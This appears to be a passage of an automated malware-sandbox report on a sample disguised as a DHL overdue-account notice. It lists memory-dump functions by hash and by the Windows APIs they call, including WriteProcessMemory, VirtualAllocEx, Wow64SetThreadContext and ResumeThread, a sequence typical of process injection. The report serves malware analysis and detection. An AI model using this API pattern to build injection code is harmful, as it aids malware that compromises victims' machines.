                                                  • Opcode ID: 4ed0f38ce664d800f954018e53f661f1787993c66fa1e4b5fe6b8634f95a82a2
                                                  • Instruction ID: 13d8635c26179ed4727b5aa37d22c4bb8cd44cad4210c35d3b52e91bbbc090d0
                                                  • Opcode Fuzzy Hash: 4ed0f38ce664d800f954018e53f661f1787993c66fa1e4b5fe6b8634f95a82a2
                                                  • Instruction Fuzzy Hash: F621C0B5D0020A9FDB10CF9AD980ADEBBF4FF58324F14842AE919E7210D774A954CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 507 78f9ee0-78f9f2c 508 78f9f2e-78f9f34 507->508 509 78f9f37-78f9f46 507->509 508->509 510 78f9f4b-78f9f84 DrawTextExW 509->510 511 78f9f48 509->511 512 78f9f8d-78f9faa 510->512 513 78f9f86-78f9f8c 510->513 511->510 513->512
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 078F9F77
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368283913.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_78f0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: d240f1488a41a1e8857550848ce17923ee3e443377ffd69679077211fc552306
                                                  • Instruction ID: ba3e45332366a94406dd8aeaa8c4094a20561c51cca7f0ac258b93e3ab288369
                                                  • Opcode Fuzzy Hash: d240f1488a41a1e8857550848ce17923ee3e443377ffd69679077211fc552306
                                                  • Instruction Fuzzy Hash: 8221C0B5D0020A9FDB10CF9AD880A9EFBF4FF58324F14842AE919E7210D774A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 73e5ab0-73e5afe 490 73e5b0e-73e5b4d WriteProcessMemory 488->490 491 73e5b00-73e5b0c 488->491 493 73e5b4f-73e5b55 490->493 494 73e5b56-73e5b86 490->494 491->490 493->494
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073E5B40
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: ffaff08af01df58f91f07daa49e5f400b390d7a0991b7ef632124f0a20ba278d
                                                  • Instruction ID: 4f6cac4342bc1c0006fb03df9ab59bad8904424501bfb2dc16a36b96ddc8997e
                                                  • Opcode Fuzzy Hash: ffaff08af01df58f91f07daa49e5f400b390d7a0991b7ef632124f0a20ba278d
                                                  • Instruction Fuzzy Hash: 4D2126B190035A9FDF10CFA9C881BDEBBF5FF88314F108429E958A7240D7789950CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 516 10be1a0-10be23c DuplicateHandle 517 10be23e-10be244 516->517 518 10be245-10be262 516->518 517->518
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BE22F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: c6b9da11b30adcd5fff00183cbc7bb7a812b38914a5ce32c8903ae279e58a04c
                                                  • Instruction ID: 16a4a59c26895f0d1271a50f55a375a6044e67065943e088821dbe9adb255f99
                                                  • Opcode Fuzzy Hash: c6b9da11b30adcd5fff00183cbc7bb7a812b38914a5ce32c8903ae279e58a04c
                                                  • Instruction Fuzzy Hash: C021E4B5D002099FDB10CFAAD985ADEBFF4FB48324F14801AE958A7350D378A955CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073E5C20
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 6b54c71418241f4aa9e48e9ea5bfe232ba3aa4bef598be4246033be5fd6a6353
                                                  • Instruction ID: 11dcf366596ab514932122c1cc599cd80465b62bd11819fef8188da79b94a3e5
                                                  • Opcode Fuzzy Hash: 6b54c71418241f4aa9e48e9ea5bfe232ba3aa4bef598be4246033be5fd6a6353
                                                  • Instruction Fuzzy Hash: DD2148B1C003599FDB10CFA9C881BEEBBF5FF88310F10842AE558A7250C7789950CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 521 73e5912-73e5963 523 73e5965-73e5971 521->523 524 73e5973-73e59a3 Wow64SetThreadContext 521->524 523->524 526 73e59ac-73e59dc 524->526 527 73e59a5-73e59ab 524->527 527->526
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073E5996
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: b18b5e6d5dcbbf2f3aa3ff04e9eb7d33b726e02a14ec61ef29208ed546465962
                                                  • Instruction ID: 20a6aeed3a96675fa8e15b28f422582cf697ef34eb854c8092f55a4c249b238b
                                                  • Opcode Fuzzy Hash: b18b5e6d5dcbbf2f3aa3ff04e9eb7d33b726e02a14ec61ef29208ed546465962
                                                  • Instruction Fuzzy Hash: C32159B1D003198FEB10CFA9C4817EEBBF4AF88324F14842AD559A7240C7789954CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073E5C20
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 9f11406c4d17103efb0edd2748be5747a1c7f0bed8174a87460b51b84ae836c7
                                                  • Instruction ID: 10e1ad62e8235363fd7712be04874806a8c5e004a18a2662b613c56b14ccb266
                                                  • Opcode Fuzzy Hash: 9f11406c4d17103efb0edd2748be5747a1c7f0bed8174a87460b51b84ae836c7
                                                  • Instruction Fuzzy Hash: DC2128B1C003599FDB10DFAAC881BDEBBF5FF48314F108429E558A7240C7789950CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073E5996
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 51e736d2d8c4afed6ef38fe1902fe7a97b729363a760d9eeb263f9755556fb04
                                                  • Instruction ID: c9fe749364bd280158a1d63d10092d63136170ece1aa70adc5df70b3d5f302e7
                                                  • Opcode Fuzzy Hash: 51e736d2d8c4afed6ef38fe1902fe7a97b729363a760d9eeb263f9755556fb04
                                                  • Instruction Fuzzy Hash: 78214CB1D003198FDB10DFAAC4857EEBBF4EF88324F148429D559A7241C7789554CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BE22F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 5c0c9358bcfdc799e3dd0b1b520f53e1286c62ddc704eb792d4e606084118288
                                                  • Instruction ID: f4ef332cd034ced03d43324c58aac0a530171a8c564c259be62b2b16e4fceefe
                                                  • Opcode Fuzzy Hash: 5c0c9358bcfdc799e3dd0b1b520f53e1286c62ddc704eb792d4e606084118288
                                                  • Instruction Fuzzy Hash: 5121E4B59002099FDB10CF9AD984ADEBFF4FB48320F14801AE958A7350D378A950CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073E5A5E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: bd7c41272a80b17ab6b84d32f4b5aebb9cfcbd82b58fbc94d310d600be87b0a2
                                                  • Instruction ID: 047b12dd2e6e6c3074199f20cd08752b314eb4f5dad8495abecdceb538e5ac98
                                                  • Opcode Fuzzy Hash: bd7c41272a80b17ab6b84d32f4b5aebb9cfcbd82b58fbc94d310d600be87b0a2
                                                  • Instruction Fuzzy Hash: A71147729002499FEB10CFA9C8447EEBFF5EF88324F148419E519A7250CB759950CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010BBF99,00000800,00000000,00000000), ref: 010BC1AA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 655ca26644a018d5bb590c2cd135bf10c91f03b869200249f5a0512921bd6488
                                                  • Instruction ID: 43f2f0a19c8854ec94cb6d2d4df6b002a120ba9f830e6e4f50703872d6ce82e2
                                                  • Opcode Fuzzy Hash: 655ca26644a018d5bb590c2cd135bf10c91f03b869200249f5a0512921bd6488
                                                  • Instruction Fuzzy Hash: E41103B6C042099FEB14CF9AD984BDEFBF8EB89310F10842AE559B7200C375A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010BBF99,00000800,00000000,00000000), ref: 010BC1AA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: b7a237e7ac54fe777722f2c3e1d4f414a738759dfa4e1130607175042abb8983
                                                  • Instruction ID: a40d4b2711b075ca3a2d34544e54587939d6344f4a6eb385edfcd88a5f1ec3f5
                                                  • Opcode Fuzzy Hash: b7a237e7ac54fe777722f2c3e1d4f414a738759dfa4e1130607175042abb8983
                                                  • Instruction Fuzzy Hash: 851147B6C002098FDB10CFAAC884BDEFBF4EB89310F14842AE558B7200C375A545CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073E5A5E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: ec9fcc3bca44ab2b3f57be64de4409486fddc226355632774d58185344123194
                                                  • Instruction ID: ce512438c1a101264582bf023e18672fb87084e2b8fb80da1320df328a736f89
                                                  • Opcode Fuzzy Hash: ec9fcc3bca44ab2b3f57be64de4409486fddc226355632774d58185344123194
                                                  • Instruction Fuzzy Hash: FD1156728002499FDB10CFAAC844BDFBBF5EF88324F148419E519A7250C775A550CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: d227d63bf8dc52a07e618714f63b3ff0587a176388272ae042c38d0de52e9868
                                                  • Instruction ID: 5bd841193ee9f3c840b32203bdc57fc6178424443fc1f6839659c1017f7200d1
                                                  • Opcode Fuzzy Hash: d227d63bf8dc52a07e618714f63b3ff0587a176388272ae042c38d0de52e9868
                                                  • Instruction Fuzzy Hash: 3B116DB1D003598FDB20CFAAC4457EFFBF4AF88314F148429D159A7240CB75A545CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 1c030048ed310ac890bf94eaefa4620966a90d8e829762a02c4e99b0ac220de5
                                                  • Instruction ID: e89d8bb0518becdd7223055e28eb05d4c7aa9cca9de147763a9d8fdb4905f92f
                                                  • Opcode Fuzzy Hash: 1c030048ed310ac890bf94eaefa4620966a90d8e829762a02c4e99b0ac220de5
                                                  • Instruction Fuzzy Hash: 80113AB1D003598FDB10DFAAC84579FFBF4AF88724F248819D519A7240CB75A544CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 010BBF1E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 783734846fda29b5d73e495c9336b8f3f520a431614598f91ef830ccbfcdd60e
                                                  • Instruction ID: ac0609ab857c4f1a6df4f5f33e1c15364a09e3924ff222ff8e2853bc978219a8
                                                  • Opcode Fuzzy Hash: 783734846fda29b5d73e495c9336b8f3f520a431614598f91ef830ccbfcdd60e
                                                  • Instruction Fuzzy Hash: 941110B6C0034A8FDB10CF9AC484BDEFBF4AF88224F10846AD558A7210C379A545CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 073EB27D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 669e5594b9e7bf6d6279f4b4c51439b4285cabf414bd620357b8f83e0e809bd2
                                                  • Instruction ID: 0655ccc1aecc25682806390cfea8ba1b53e72133d04528094443270de83923e3
                                                  • Opcode Fuzzy Hash: 669e5594b9e7bf6d6279f4b4c51439b4285cabf414bd620357b8f83e0e809bd2
                                                  • Instruction Fuzzy Hash: 97110FB5800359DFDB10CF8AC484BAEBBF8EB48320F108419E958A7240C3B5A940CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 073EB27D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: bbd7f773fac5587d7e741307daf8e2e09b39ac08bedeabfa79042431d311eae2
                                                  • Instruction ID: fe39b5952e24853086feac2821db0a5feeefe8f4d4ba9b6bb25fd1d0ca1a4053
                                                  • Opcode Fuzzy Hash: bbd7f773fac5587d7e741307daf8e2e09b39ac08bedeabfa79042431d311eae2
                                                  • Instruction Fuzzy Hash: FA1110B5800259DFDB10CF99C984BDEBFF8EB48320F24841AE558A7610C374A654CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 073EBB47
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: aba29ef62f13fdfddbc3cfa8f01ce4c53cd3c8493b9aee61018f9b9641031128
                                                  • Instruction ID: 059fc7a0c6f88fc7e9a59f50971bec2663481ecb253cb54363d1971c3c678b52
                                                  • Opcode Fuzzy Hash: aba29ef62f13fdfddbc3cfa8f01ce4c53cd3c8493b9aee61018f9b9641031128
                                                  • Instruction Fuzzy Hash: 02F0D4B0C4135ADFDB44DFB8C805BAEBBB5AB05301F105669C418A3294D7B49A80CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O};5
                                                  • API String ID: 0-3558557551
                                                  • Opcode ID: d69a740aed30a687808bc00536a0eea8c2ca9266b4c85ac58a5daf0ed8e23467
                                                  • Instruction ID: 5b5295ea8f104569d81ce7a489bae8fc15bdaa018240e73ee06e5cb7eb7e453a
                                                  • Opcode Fuzzy Hash: d69a740aed30a687808bc00536a0eea8c2ca9266b4c85ac58a5daf0ed8e23467
                                                  • Instruction Fuzzy Hash: 6D41BFB0A11609DFDB48CFA5D5858AEFBF1FB89310F61D495C409A7314D338EA11CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b8cc3bac56c701e9c4bfc8ad95228f9c60eafc17df6f8d58a21fdf3c4348382
                                                  • Instruction ID: decd652e2543961820ca2b179939aedac0fc777f1ee06d4da4b27785aa7453a1
                                                  • Opcode Fuzzy Hash: 5b8cc3bac56c701e9c4bfc8ad95228f9c60eafc17df6f8d58a21fdf3c4348382
                                                  • Instruction Fuzzy Hash: AB020575600205DFDB58DF68D498AAD7BF2FF89314F5582A8E4099B362CB34EC86CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a95140e84f18b2ca57cb71874e33d4ce23d0cc19c80c75a87f35a82679e57eb3
                                                  • Instruction ID: 177115d19dfd2e5368c9e16e9d416e66daba370c3c5aab6fc1afb2404ac1b2bb
                                                  • Opcode Fuzzy Hash: a95140e84f18b2ca57cb71874e33d4ce23d0cc19c80c75a87f35a82679e57eb3
                                                  • Instruction Fuzzy Hash: F1C12675A00215CFCB55DFA8D594AADBBF1BF89310B1545A9E506EB3A1CB30EC42CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d40322a5027d7dd6b207e66a1a650bf3aa51cc89eb6f64d653ab72aa43e2026
                                                  • Instruction ID: b0dcbb6f953fb9c933a2f607910dc4f6dab0c3a9a7dac0074b54e90fdd6cc701
                                                  • Opcode Fuzzy Hash: 9d40322a5027d7dd6b207e66a1a650bf3aa51cc89eb6f64d653ab72aa43e2026
                                                  • Instruction Fuzzy Hash: EF61CA71B002059FCB58EBB4D4546AE7BA2AFC5310B2485AED409DB396CF35ED02DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f40a025a49fa1e8dce15e6455f4b886b50df98d1fa377ebafb0fd5399fce5e05
                                                  • Instruction ID: a8dd4a23a4a34240d01174b1486acfdb460470bf617db1d2d3855b6a3046a56d
                                                  • Opcode Fuzzy Hash: f40a025a49fa1e8dce15e6455f4b886b50df98d1fa377ebafb0fd5399fce5e05
                                                  • Instruction Fuzzy Hash: 456139B4D1520ADFEB08CFA9D4446EEBBFAFF49300F189129E419AB655C7386942CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd6d9ef54e0b4175aaccdf5bac419944314f70a5ac586603962b7b4b0871dce3
                                                  • Instruction ID: e99116d11028174c1194c2be143fa793a46d4d0cc340de4e3408f82234e6ed62
                                                  • Opcode Fuzzy Hash: dd6d9ef54e0b4175aaccdf5bac419944314f70a5ac586603962b7b4b0871dce3
                                                  • Instruction Fuzzy Hash: 6D5117B5E04219CFDB60DFA8D845BEDB7F6BB49310F209229E809A7385CB385946DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 952351b401e185c0722aa328308fad377a3a520c0371784faf7f22a32e3ca1a2
                                                  • Instruction ID: ba7934dc9ccc5dd8145648acc16edcfd1c31dc8dd60e3ab15a5bf2ba1e085615
                                                  • Opcode Fuzzy Hash: 952351b401e185c0722aa328308fad377a3a520c0371784faf7f22a32e3ca1a2
                                                  • Instruction Fuzzy Hash: FC518B72600216CFDB59CF34C894BA9BBF1EF49704F1582AAE506DB261CB38EC46DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa2d7c8928dc8d08e01cd559f84416bda5f37ac3f42686e90da861dd96193a81
                                                  • Instruction ID: 6ce0d0e7eebf19d2504940e3f257ea5b49df14e47eaeb57e755c739265d913e1
                                                  • Opcode Fuzzy Hash: fa2d7c8928dc8d08e01cd559f84416bda5f37ac3f42686e90da861dd96193a81
                                                  • Instruction Fuzzy Hash: 0451D371B002068FDB08EB79D8549BEBBF6FFC4260B148969E419DB351EF34AD068791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23b8603cf4205af04f6b145d4fae00d687bf3b5f473aca9cd3b7fd282d2ca1d6
                                                  • Instruction ID: 53e2503022ef45e12331dd9aaf067192041dbdf9284253f228fc059e1166ba1a
                                                  • Opcode Fuzzy Hash: 23b8603cf4205af04f6b145d4fae00d687bf3b5f473aca9cd3b7fd282d2ca1d6
                                                  • Instruction Fuzzy Hash: B3513AF5A04219CFDB20DFA8D841BEDB7B6BB49310F209219E809A7385CA395A46DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
